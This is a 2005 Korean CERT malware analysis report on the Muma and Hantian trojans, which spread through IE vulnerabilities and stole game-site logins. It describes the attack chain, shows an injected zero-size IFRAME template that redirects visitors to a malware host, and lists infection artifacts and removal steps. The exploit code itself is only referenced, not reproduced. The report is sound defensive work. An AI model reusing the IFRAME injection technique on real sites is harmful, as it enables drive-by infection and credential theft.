Muma, Hantian Trojan 분석

KrCERT-AR-2005-82 http://www.krcert.or.kr
Muma, Hantian Trojan 분석 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
Muma, Hantian Trojan 분석
2005. 8. 8
인터넷침해사고대응지원센터 (KISC)
※ 본 보고서의 전부나 일부를 인용시 반드시 [자료: 한국정보보호진흥원(KISA)]를 명시하여 주시기 바랍니다.
KrCERT-AR-2005-82 http://www.krcert.or.kr
Muma, Hantian Trojan 분석 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 1 -
□ 개 요
최근 웹 서핑 중 사용자 모르게 Trojan에 감염되는 피해가 많이 발생하고
있다. 이러한 종류의 Trojan 감염은 보통 웹 브라우져의 취약점으로 인하여
발생한다. Trojan 제작자는 일반적으로 사용자들이 많이 방문하는 사이트들
을 해킹하여 전파 매개체로 악용하므로, 최신 패치를 적용하지 않고 인터넷
사용할 경우 감염될 가능성이 높다. 일단 Trojan에 감염되면 PC내의 주요
정보가 유출 될 수 있으므로 사용자는 인터넷 사용 전에 반드시 최신 패치
여부를 확인 하도록 한다.
이 분석보고서 에서는 국내에서 피해 발생이 확인된 “muma”, “hantian”
Trojan을 대상으로 감염 유형 및 증상을 알아보았다.
□ 공격 절차
“muma”, “hantian” Trojan 전파를 위한 공격 절차는 다음과 같다.
o 공격 절차
공격자는 사용자들이 많이 방문하는 웹 사이트들을 해킹하여 주요 Main
페이지 내에 IFRAME을 삽입한다. 이 IFRAME으로 인하여, 사용자가 해당
사이트에 접속할 경우 사용자 모르게 Trojan이 설치되어 있는 악성코드
숙주서버로 재 연결 되게 된다. Trojan을 설치하기 위하여 악용되는 취약
점은 “ITS Protocol Handler 취약점” 과 “IE IFRAME TAG Overflow” 취
약점 인 것으로 확인되었다. Trojan을 전파시키기 위하여 사용하는 기법과
절차를 요약하면 다음과 같다.
i) 공격자는 악성코드 숙주 사이트를 구성한다.
ii) 공격자는 취약한 유명 웹 사이트를 해킹하여, 해당 사이트를 접속하는 경우
악성코드 숙주서버로 자동 재접속이 되도록 페이지 내에 IFrame을 삽입한다.
iii) 사용자가 웹 서핑 중 해당 사이트 (악성 IFRAME이 삽입된 사이트)에 접속 할
경우, 악성코드 숙주 서버로 사용자 모르게 접속되어 감염되게 된다.
iv) 감염 후 특정 게임사이트 계정 정보가 공격자가 의도하는 곳으로 유출된다.
※ iframe (inline frame)란 HTML문서 안에 또 다른 HTML문서를 삽입할 수 있도록 해주
는 기능을 하는 태그
KrCERT-AR-2005-82 http://www.krcert.or.kr
Muma, Hantian Trojan 분석 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 2 -
□ 공격 기법
o Trojan 전파에 이용되는 취약점 및 공격코드 분석
사용자 브라우져를 공격하기 위하여 두개의 취약점을 동시에 이용하는 것
이 확인 되었는데, 이는 공격의 성공률을 높이기 위한 것으로 보인다. 최
근에 이용되는 취약점은 “ITS Protocol Handler 취약점” 과 “IE IFRAME
TAG Overflow 취약점” 으로 관찰되고 있다. 단, 이러한 취약점 외에도 최
근의 Jview Profiler 취약점 및 기타 취약점들이 공격에 악용되고 있을 것
으로 보인다.
- ITS Protocol Handler 취약점
* 취약 요소
Internet Explorer는 mhtml: protocohandler 를 이용하여 MHTML 형
식의 파일에 접근할 수 있다.
만약, IE가 ITS 및 mhtml: protocolhandler을 통하여 mhtml 형식의
파일에 접근을 시도 할 때 해당 파일이 존재하지 않거나, 접근이 불가
능할 경우, ITS 프로토콜 핸들러는 명시되어 있는 대체 주소의 chm
KrCERT-AR-2005-82 http://www.krcert.or.kr
Muma, Hantian Trojan 분석 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 3 -
파일에 접근을 시도하게 된다. 이 때 핸들러는 해당 chm 파일 을 처
음 접근에 실패 하였던 mhtml 파일의 보안 도메인 영역 내에서 다루
게 된다. 처음 접근에 실패하였던 mhtml 파일이 Local Machine Zone
내에 있다면, chm 파일 또한 Local Machine Zone 보안 도메인 내에
서 처리되게 된다. 따라서 chm 내에 악의적인 스크립트가 존재할 경
우 피해를 발생 시키게 된다.
예를 들어 아래에서 "c:.mht" 파일이 존재하지 않을 경우 ITS프로토
콜 핸들러는 http://aaa.bbb.ccc.ddd/index.chm::/aa.htm로 접근을 시
도하게 되는데 "c:.mht" 가 Local Machine Zone 영역이므로 aa.htm
내의 스크립트 또한 Local Machine Zone 영역 내에서 실행되게 된다.
<ITS Protocol Handler 취약점 Exploit 공격코드 및 공격과정 예>
* 공격 코드 분석
“muma” 및 “hantian” Trojan을 배포하는 사이트에서 어떤 공격을 통
하여 취약점을 악용하는지 분석하였다. 공격 코드는 내용 파악이 어
렵도록 escape 후 encoding 처리가 되어 있었다.
KrCERT-AR-2005-82 http://www.krcert.or.kr
Muma, Hantian Trojan 분석 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 4 -
<Encoding 된 Exploit 공격 코드>
Decoding 및 Unescape 하면 아래와 같은 공격코드가 나타나게 된다.
코드 내에 “ITS Protocol Handler 취약점”을 공격하는 패턴이 포함되
어 있는 것을 확인할 수 있다
- IE IFRAME TAG Overflow 취약점
* 취약 요소 및 공격 코드 분석
IFRAME HTML TAG 의 "SRC" 와 “NAME" 속성에 긴 문자열을 포
함시킬 경우 Overflow가 발생하여 임의의 코드가 실행될 수 있다
“hantian” Trojan 전파에 이러한 공격 패턴이 관찰되었다
hantian” Trojan 전파에 사용된 공격 코드는 다음과 같다.
KrCERT-AR-2005-82 http://www.krcert.or.kr
Muma, Hantian Trojan 분석 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 5 -
<Encoding 된 Exploit 공격 코드>
이 공격 코드도 역시 내용 파악이 어렵도록 Escape 후 Encoding 처
리가 되어 있다.
공격코드를 Decoding하여 보면 아래와 같이 “IE IFRAME TAG
Overflow” 를 발생시키기 위해서 IFRAME의 “SRC”와 “NAME” 속
성에 비정상적으로 많은 문자열이 채워지는 것을 확인할 수 있다.
o 유명 웹 사이트 IFRAME 삽입 유형 분석
공격자는 Trojan을 보다 효과적으로 전파시키기 위하여, 사용자들이 많이 방
문하는 사이트를 이용하였다. 즉, 사용자들이 많이 방문하는 다수의 사이트
의 주요 페이지를 변조하여, 방문 시 자동적으로 Trojan 숙주 서버로 재 접
속이 발생되도록 한다. 이를 위하여 주요 페이지 내에 아래와 같은 IFRAME
문구를 삽입하였다.
KrCERT-AR-2005-82 http://www.krcert.or.kr
Muma, Hantian Trojan 분석 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 6 -
<IFRAME marginWidth=0 marginHeight=0 src="[Trojan 숙주사이트]"
frameBorder=0 width=0 scrolling=no height=0></IFRAME>
사용자가 Trojan 숙주 서버로 재접속되는 것을 인지하지 못하도록 Frame
Size를 0 by 0 로 설정해 놓은 것을 확인할 수 있다
또한 패턴 탐지를 어렵게 하기 위하여 아래와 같이 escape 문자열을 이용
하기도 한다
해당 코드를 unescape 하면 Trojan 숙주 사이트 연결을 위한 IFRAME 구
문임을 확인할 수 있다
□ 감염 시 악성 행위 분석
“muma” 및 “hantian” 는 감염 시 발생하는 현상이 유사하다.
동일한 계열의 Trojan 으로 보인다. 감염 시 현상은 다음과 같다.
o OS 에 악성코드 설치
i) c:Program Filesexplorer.exe 위치에 "explorer.exe" 파일이 생성된다.
KrCERT-AR-2005-82 http://www.krcert.or.kr
Muma, Hantian Trojan 분석 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 7 -
“윈도우 시스템” 폴더에 hzdll.dll 파일이 생성된다.
루트 폴더에 logo.dat 파일을 생성한다. 이 파일에는 특정 게임 사이트에
대한 ID 및 암호가 저장 되게 된다.
iii) 재부팅 시에도 다시 로드 되도록 아래의 레지스트리 값을 추가한다.
<레지스트리 추가 위치 및 Value>
o 정보유출 백도어 기능 분석
감염 후 특정 게임 사이트에 접속하여 Login할 경우, Login 계정, Password
정보가 공격자에게로 유출 된다.
i)사용자가 아래 게임사이트에 Login하면 Trojan은 사용자의 계정,암호를
logo.dat에 저장시킨다. 다른 일반사이트 로그인 정보는 기록되지 않는다.
- http://www.han[생략].com
- http://www.netm[생략].com/index.asp
KrCERT-AR-2005-82 http://www.krcert.or.kr
Muma, Hantian Trojan 분석 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 8 -
※ han[생략] 및 netm[생략] 사이트 Login 계정, Password 정보를
아래와 같이 c:logo.dat 파일에 기록함
ii) Trojan내에 정보를 특정사이트로 보내기 위한 전송 쿼리문이 코딩되어
있다.
<Muma Trojan 의 경우>
<Hantian Trojan 의 경우>
KrCERT-AR-2005-82 http://www.krcert.or.kr
Muma, Hantian Trojan 분석 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 9 -
□ 피해 현황 및 위험 요소
o 국내 많은 웹 사이트가 Trojan 전파 매개체로 악용되고 있는 것으로 확인
되어 주의가 필요하다.
o 패치가 최근 발표된 Jview Profiler 취약점등이 전파기법으로 추가될 가능
성이 있어 이에 대한 주의가 필요하다.
o 웹브라우져 취약점을 이용하여 감염되는 악성코드의 경우 네트워크 방화벽
이 감염을 방지해 줄 수 없으므로 사용자 단의 주의와 관심이 요구된다.
□ 사전 예방 방법
o 사용자는 감염을 예방하기 위하여 인터넷 사용 전에 반드시 MS05-037 이
상 패치를 실시하도록 한다.
o 웹 관리자는 관리 웹페이지 내에 관리자가 알지 못하는 확인되지 않은 코
드가 존재하는지 수시로 점검한다. 또한 웹 서버가 해킹 공격을 받지 않도
록 취약점 패치 실시 등 보안관리에 만전을 기한다.
□ 감염 시 조치 방법
PC가 악성코드에 감염 되었을 경우, 다음과 같이 조치하도록 한다.
Step1. 윈도우를 다시 시작하여 안전 모드로 부팅한다.
(부팅시 F8을 누른 후 안전모드 선택)
KrCERT-AR-2005-82 http://www.krcert.or.kr
Muma, Hantian Trojan 분석 cert@krcert.or.kr
____________________________________________________________________________________________
____________________________________________________________________________________________
- 10 -
Step2. Trojan 이 Program Files 폴더에 생성한 explorer.exe를 삭제한다
Step3. 시작 → 실행 → “regedit" 입력 하여 레지스트리 Editor 를 실행한 후
아래 위치의 적색부분의 레지스트리값을 삭제한다 .
HKLMsoftwareMicrosoftWindowsCurrentVersionRun
LTt1 "C:Program Filesexplorer.exe"
Step4. 재 부팅 한다.
[참고 사이트] http://www.securityfocus.com/bid/9658/discuss
http://www.kb.cert.org/vuls/id/842160